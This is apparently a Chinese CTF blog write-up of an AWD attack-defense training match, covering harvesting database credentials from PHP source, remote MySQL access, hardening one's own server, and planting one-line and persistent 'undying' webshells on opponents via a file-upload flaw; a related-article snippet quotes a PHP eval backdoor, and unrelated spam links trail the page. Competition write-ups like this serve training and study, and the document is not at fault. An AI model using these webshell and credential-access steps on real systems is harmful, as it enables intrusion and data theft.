AWD训练赛QWQ

183 篇文章 22 订阅
订阅专栏
6 篇文章 1 订阅
订阅专栏

使用D盾啥都没扫到,河马倒是扫了挺多东西,但是代码审计能力太差,不怎么看得懂

一般这里我们如果扫到那种很明显的一句话木马,直接删掉,爆出对手IP后尝试利用

代码审计能力不好,只能从网站页面入手

是一个登录界面,尝试一些弱口令登录,发现不行

找到登录界面的文件login.php,

检索一些关键字(password、email)

这里并没有发现什么有用信息

继续去找和这个文件相关的文件,容易发现它还包含了两个文件

经过查看head.php和connect.php,最终在后者发现了数据库远程连接的账号密码

$username = "cms";

$password = "eb0d39d2931c480f";

使用命令进行mysql远程连接

mysql -h47.104.192.166 -P3306 -ucms -peb0d39d2931c480f

 

连上之后我们查它的数据库和表

最后在cms库下的users表里发现了页面的登录邮箱和密码

admin@bugku.com
21232f297a57a5a743894a0e4a801fc3

 这里密码进行了加密,解md5得到密码为 admin

在cms库下有一个flag表,我们尝试查它的具体内容,并没有flag

先去登录网站页面

进去之后很容易发现存在文件上传漏洞

其实我们第一时间是应该修改自己的登录密码,防止被别人改了,每个队伍的账号密码是一样的

但是在网页上似乎改不了

我们可以在数据库里进行修改

update cms.users set password=password('testtest') where email='admin@bugku.com';

改了之后最好刷新一下配置

flush privileges;

现在别人就无法使用默认的密码对我们的网站进行登录

但是这里还有个问题,别人依然可以远程连接我们的数据库来查看我们的users内容

也就是说,我们还需要修改数据库远程连接的密码

而那个密码并不在cms库,而是在mysql数据库下的user表

修改密码的命令

update mysql.user set password=password('新密码') where user='用户名';

 一定注意:

MySQL 5.7.6版本以下,才能使用此方法来修改密码,从MySQL 5.7.6版本起,user表使用authentication_string列代替之前版本中的password列来存储密码,并且它删除了password列。

我们使用最新的列名进行修改 

update mysql.user set authentication_string=password('新密码') where user='用户名';

先查一下它原本的信息(登录IP,用户名,密码)

select host,user,authentication_string from mysql.user;

修改cms的密码,假设改为111111

update mysql.user set authentication_string=password('111111') where user='cms';

修改成功后记得刷新配置

再次尝试使用默认密码连接数据库,发现已经不行了

 使用新修改的密码111111,连接成功

刚才查出的host其实还存在一个问题

如果Host=%,表示所有IP都有连接权限。

虽然我们已经修改了连接的密码,但是保险起见,我们最好还是再完善一下 

这里不能直接删掉这个%,因为删掉的话cms这个用户就彻底无法连接了,包括你自己

我们应该将%改为localhost

update mysql.user set host=localhost where user='cms';

修改后同理需要刷新配置

这样只要不是本地的ip(这里指的是非队伍白名单里的ip)都无法使用cms用户来远程连接我们的数据库了,当然更不能查看到我们修改后的网站登录密码。

接下来我主要再讲一下前面提到的文件上传漏洞利用,其实在awd里面我们更应该做好的是防护。

爆出对手的域名之后,使用ping命令就可以拿到对应的ip

我先上传的是普通一句话木马,成了,没有任何绕过

连上之后也很容易找到flag

 

之后直接传不死马

关于不死马的原理利用和处理方法可以参考我另一篇博客:

http://t.csdnimg.cn/yU0vb 

同样上传成功

可以看到,尽管我删除了它,但是它依然存在,这就是不死马的魅力

不死马隐蔽性也比较好,只要对手还没处理掉这个不死马,我们就能通过这个shell拿flag

还有一个问题就是,虽然在数据库里select查不到flag,但我们通过系统命令其实可以cat到flag

但是这是一个错误的flag,不知道是完全错误的还是进行了加密的,有大佬可以告知一下原因吗?

这里cat出来的flag和蚁剑里面获取的flag内容不一样 ,很奇怪

此外,在比赛途中我们也要经常查看一下有没有其他用户登录了我们的服务器,以及有没有新产生的什么可疑文件:

如果有其他用户登录直接将它踢掉,发现被上传了木马直接删掉,如果遇到不死马就写脚本,基于条件竞争来克制,具体的awd常见防御操作请参考我另一篇博客:

http://t.csdnimg.cn/QKR2L 

我是Myon,后续会继续给大家更新CTF、AWD,网络安全、渗透测试等相关的内容,

喜欢的可以关注点赞支持一下,谢谢!

AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py web_chinaz 10 web_chinaz 为应用文件名称,10表示要生成的队伍数量 start.py python start.py 10 启动10个实例,以及check和flag服务。 stop_clean.py python stop_clean.py 暂停所有服务,并删除临时文件 注意,这里会删除所有现运行的容器,请谨慎使用。 pass.txt 存储队伍用户名密码,以及ssh、web端口 team01 ctf:308d66 ssh:2201 port:8801 team02 ctf:024b1d ssh:2202 po
一个awd训练平台
qq_44657899的博客
10-26 1万+
前言 如果是第一次打awd,那么使用这个平台是非常好的选择,下面我将我使用这个平台的过程和踩得坑一一列举,希望对其他awd新手有所帮助。 介绍这个平台的博客很多,我感觉这位师傅写的比较好,我刚开始就是看的这些博客学习如何使用: AWD线下攻防平台搭建 AWD线下攻防环境使用 文章目录前言0x01 环境配置-安装docker0x02 环境配置-配置加速服务器0x03 平台搭建0x04 平台使用0x05 一些小问题 0x01 环境配置-安装docker 我安装docker都是按下面这篇文章来的,一个命令一个命令
【Cardinal的AWD攻防平台搭建】
weixin_42266726的博客
09-13 389
基于Cardinal的AWD攻防平台,靶机使用的是awd-platform里的内容。
AWD练习平台搭建 & 附虚拟机资源
monster663的博客
06-04 4107
最近需要准备线下AWD了,但是没有那么多金币每天上BugKu的PVP在线AWD对战进行练习,于是想着可以自己搭建一个团队内部使用的AWD攻防平台,浅浅的记录一下。
awd攻防训练赛1
soldi_er的博客
05-28 3304
文章目录前言1.服务器运维2.攻击环节探测其他队伍主机攻击总结反思 前言   学校战队的几个人简单尝试了一下bugku的线上awd攻防赛,做个记录。 1.服务器运维   下载Web源码:xftp连接192-168-1-247.pvp254.bugku.cn/,在/var/www/html目录下有网站源代码.zip,下载。   连接服务器主机:ssh连接服务器,以team2身份在根目录下寻找主机上的flag文件。 find / -name "*flag*" 2.攻击环节 探测其他队伍主机   编写Pyt
搭建CTF-AWD训练平台
热门推荐
test
05-21 5万+
下载 git clone https://github.com/zhl2008/awd-platform 项目大小是429.03M,下载了整整一个小时 项目说明 AWD线下环境启动说明 by Hence Zhang @Lancet 比赛的环境介绍: 服务器全部以docker形式部署在同一台虚拟机上。 Check_server: 服务检查服务器,用于判定选手维护的服务是否可用,如果不可用,则...
CTF-AWD 训练平台:打造你的网络安全训练场
最新发布
gitblog_00577的博客
09-25 265
CTF-AWD 训练平台:打造你的网络安全训练场 AWD_CTF_Platform 一个简单的AWD训练平台 项目地址: https://gitcode.com/gh_mirrors/aw/AWD_CTF_Platform ...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-8.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
S2 AWD排位赛-6.zip
12-07
【S2 AWD排位赛-6.zip】这个压缩包文件是BugKu在2021年举办的一场Capture The Flag(CTF) Automated Web Defense(AWD)排位赛的真实比赛题目集合。CTF是一种信息安全竞赛,参赛者通过解决各种安全问题来得分,而...
S2 AWD排位赛-11.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
CTF-AWD-WEB AWD 模式下的WEB试题仓库 上传一些参加过的CTF线下赛AWD模式的WEB试题等
S2 AWD排位赛-9.zip
12-07
【S2 AWD排位赛-9.zip】这个压缩包文件是BugKu在2021年举办的一场CTF(Capture The Flag)攻防战排位赛的真实题目集合。CTF是一种网络安全竞赛,参赛者通过解密、逆向工程、漏洞挖掘等技术手段获取“旗标”(Flag)...
AWD学习
zb0567的专栏
09-14 2045
基本流程 1、拉下题目文件 2、迅速分析题目漏洞 3、将漏洞打上补丁回传 4、解题、攻击 5、抓流量、防御 一、靶机信息收集 PWN靶机、通过XSHELL连接,下载LIBC文件和ELF文件,下载完请备份 一般 nc ip + 端口 libc 一般在 lib/x86_64-linux-gnu 的libc-2.23.so文件 这个是运行时,所以要下载 创建一个比赛文件副本,将pwn和so文件拷贝进去 需要自己寻找pwn题目的端口,每个队伍pwn挂载端口都是相同的 nmap工具扫描一遍pw
寒假AWD训练之初学代码审计
qq_42728977的博客
01-17 1290
寒假在家,老师组织了AWD训练赛,还是实战出真知,感觉比赛的学习效率是真的高。做个小总结。 也是刚入门,欢迎大佬斧正。 漏洞1:webshell.php 第一个漏洞是后门的,是一句话木马。 <?php @eval($_POST['moxiaoxi']) ?> 很简单,没有什么难度,可以直接菜刀,但是菜刀不能批量自动化获取flag。所以,尝试着写脚本。 import requests ...
CTF - AWD (Attack with Defense) 线上下赛 攻防平台
微风飘呀飘
05-28 5966
Ti0sAWD是由 Ti0s-Team 开发的 awd 竞技攻防平台,使用 PHP + Mysql 编写。 本程序可以作为 CTF 线上 线下比赛平台,亦可用于团队内部 AWD 模拟训练 推荐服务器 4H8G + 20G + Centos 网站架构: 前端:Materialize CSS +jQuery +部分Bootstrap,采用Html + Ajax动态刷新页面 后端:纯PHP 数据库Mysql Awd 网络攻防竞技系统模式 基于Docker服务的Aw...
AWD平台搭建——Cardinal
路baby的博客
08-24 5991
Cardinal 是由 Vidar-Team 开发的 AWD 比赛平台,使用 Go 编写。本程序可以作为 CTF 线下比赛平台,亦可用于团队内部 AWD 模拟练习。Cardinal 这个名字来源于作品《刀剑神域》中的游戏系统,小说中描述为可在无需任何人工外界输入就可以独立完成对玩家的监控、维护游戏数据平衡、自动产生新的游戏任务、进行自我修复与完善......
【2020安洵杯线下赛】AWD的第一道pwn题
古月浪子的博客
12-18 2489
题目是一个简易代码执行器 按照以前的此类题型的经验试了一下,通过指针任意读写的方法好像用不了(不知道是不是我菜了-_- 可以看到一个ev函数,我们在sub_21B4函数中找到它的实现 可以发现我们能echo4个字符,如果让拼接的字符串变成echo 0;sh即可拿到shell 写脚本打全场: #!/usr/bin/python3 from pwn import * from LibcSearcher import * import requests def submit_flag(flag):
2021 BugKu CTF AWD排位赛真题解析
资源摘要信息:"S2 AWD排位赛-13.zip" BugKu 2021 CTF AWD排位赛真题涵盖了信息安全领域中一项重要的技能竞技——Capture The Flag(CTF)的高级竞赛部分,即AWD(Attack With Defense,攻防对抗)模式。该模式特别...
写文章

热门文章

  • 主动扫描-Nmap-端口、系统、服务扫描 13211
  • 如何解决桌面图标变白(原因及方法) 12362
  • 利用ngrok实现内网穿透(全网最详细教程) 11309
  • log4j2 远程代码执行漏洞复现(CVE-2021-44228) 9906
  • Kali Linux 的常用命令 9838

分类专栏

  • PHP 57篇
  • ctfshow 79篇
  • web 183篇
  • Misc 34篇
  • CTF 116篇
  • 电脑问题 27篇
  • Python 37篇
  • SQL 33篇
  • 网站搭建 10篇
  • 内网渗透 11篇
  • 基于kali的渗透测试 20篇
  • 文件上传 9篇
  • Linux 3篇
  • 文件包含 4篇
  • AWD 6篇
  • pwn 27篇
  • 信息系统安全与对抗 6篇
  • DVWA靶场 10篇
  • HVV 8篇
  • CVE 4篇
  • pikachu靶场 5篇
  • 云原生 2篇
  • XSS 2篇
  • 计算机网络 9篇
  • MySQL数据库实验 8篇
  • 图像处理 4篇
  • 模电速成 6篇
  • 信号与系统实验&电路分析基础实验A1 6篇
  • C++期末速成与C++实验报告 21篇
  • 西科大数模电实验 22篇
  • 数据结构 5篇
  • 电磁场与电磁波 6篇
  • crypto 4篇
  • SSTI 5篇
  • re 1篇
  • 个人成长 1篇

最新评论

  • ctfshow-web入门-爆破(web25)及php_mt_seed工具的安装与使用

    woyaoshangguofu: 哦哦好的,我再琢磨琢磨表情包

  • ctfshow-web入门-爆破(web25)及php_mt_seed工具的安装与使用

    Myon⁶: 啊这,没遇到过这个报错表情包

  • ctfshow-web入门-爆破(web25)及php_mt_seed工具的安装与使用

    woyaoshangguofu: 师傅,但是使用php_mt_seed时显示 系统无法接受输入的时间 怎么办啊

  • 关于已配好java环境但双击无法打开jar包的解决方案

    坑坑166: 好,别的教程都是给个路径,然而我的路径对不上,搜索一搜就出来了表情包

  • 关于DVWA靶场Could not connect to the database service的几种解决办法

    煎蛋在冒泡哎: 表情包为啥配置完又出现“CSRF token is incorrect”表情包

最新文章

  • ctfshow-web入门-反序列化(web254-web258)
  • NewStarCTF2024-Week2-Misc-WP
  • NewStarCTF2024-Week2-Web-WP
2024
10月 5篇
09月 7篇
08月 16篇
07月 25篇
06月 16篇
05月 9篇
04月 31篇
03月 16篇
02月 11篇
01月 28篇
2023年260篇
2022年13篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或 充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

玻璃钢生产厂家铜铸雕塑与玻璃钢雕塑玻璃钢雕塑 广州广东玻璃钢佛像雕塑批发天筑玻璃钢雕塑玻璃钢雕塑订做单价郑州商场美陈玻璃钢卡通雕塑黄岛玻璃钢花盆花器梅州透明玻璃钢雕塑生产商唐山玻璃钢仿真水果雕塑石嘴山玻璃钢雕塑加工郑州抽象玻璃钢雕塑订做价格龙口玻璃钢花盆花器河北定做玻璃钢牛雕塑南京通用玻璃钢雕塑在线咨询兰州玻璃钢铜雕人物雕塑厂家玻璃钢雕塑是什么玻璃清远玻璃钢卡通雕塑批发定制户外玻璃钢卡通雕塑销售价格高端玻璃钢雕塑台湾玻璃钢雕塑仿真牛武陟玻璃钢雕塑呼市玻璃钢仿铜雕塑雕塑材料玻璃钢哪家好辽宁广场玻璃钢雕塑设计长沙花朵玻璃钢雕塑安徽商城艺术玻璃钢雕塑价格顺义商场美陈装饰如何装饰南宁抽象玻璃钢雕塑订做价格上海商场主题创意商业美陈哪家好玻璃钢花盆厂家直销香港通过《维护国家安全条例》两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”19岁小伙救下5人后溺亡 多方发声单亲妈妈陷入热恋 14岁儿子报警汪小菲曝离婚始末遭遇山火的松茸之乡雅江山火三名扑火人员牺牲系谣言何赛飞追着代拍打萧美琴窜访捷克 外交部回应卫健委通报少年有偿捐血浆16次猝死手机成瘾是影响睡眠质量重要因素高校汽车撞人致3死16伤 司机系学生315晚会后胖东来又人满为患了小米汽车超级工厂正式揭幕中国拥有亿元资产的家庭达13.3万户周杰伦一审败诉网易男孩8年未见母亲被告知被遗忘许家印被限制高消费饲养员用铁锨驱打大熊猫被辞退男子被猫抓伤后确诊“猫抓病”特朗普无法缴纳4.54亿美元罚金倪萍分享减重40斤方法联合利华开始重组张家界的山上“长”满了韩国人?张立群任西安交通大学校长杨倩无缘巴黎奥运“重生之我在北大当嫡校长”黑马情侣提车了专访95后高颜值猪保姆考生莫言也上北大硕士复试名单了网友洛杉矶偶遇贾玲专家建议不必谈骨泥色变沉迷短剧的人就像掉进了杀猪盘奥巴马现身唐宁街 黑色着装引猜测七年后宇文玥被薅头发捞上岸事业单位女子向同事水杯投不明物质凯特王妃现身!外出购物视频曝光河南驻马店通报西平中学跳楼事件王树国卸任西安交大校长 师生送别恒大被罚41.75亿到底怎么缴男子被流浪猫绊倒 投喂者赔24万房客欠租失踪 房东直发愁西双版纳热带植物园回应蜉蝣大爆发钱人豪晒法院裁定实锤抄袭外国人感慨凌晨的中国很安全胖东来员工每周单休无小长假白宫:哈马斯三号人物被杀测试车高速逃费 小米:已补缴老人退休金被冒领16年 金额超20万

玻璃钢生产厂家 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化